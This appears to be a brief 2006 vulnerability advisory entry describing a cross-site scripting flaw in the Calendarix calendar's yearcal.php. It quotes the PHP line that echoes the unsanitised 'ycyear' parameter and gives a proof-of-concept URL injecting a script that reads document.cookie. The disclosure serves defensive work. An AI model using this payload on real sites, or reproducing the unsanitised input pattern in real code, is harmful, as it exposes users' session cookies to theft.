Calendarix "yearcal.php" XSS Attacking

2006-04-17T00:00:00
ID SECURITYVULNS:DOC:12267
Type securityvulns
Reporter Securityvulns
Modified 2006-04-17T00:00:00

Description

Website : http://www.calendarix.com

Vulnerable :

if (!isset($_GET['ycyear'])) $ycyear = $y ; else $ycyear = $_GET['ycyear'];

http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>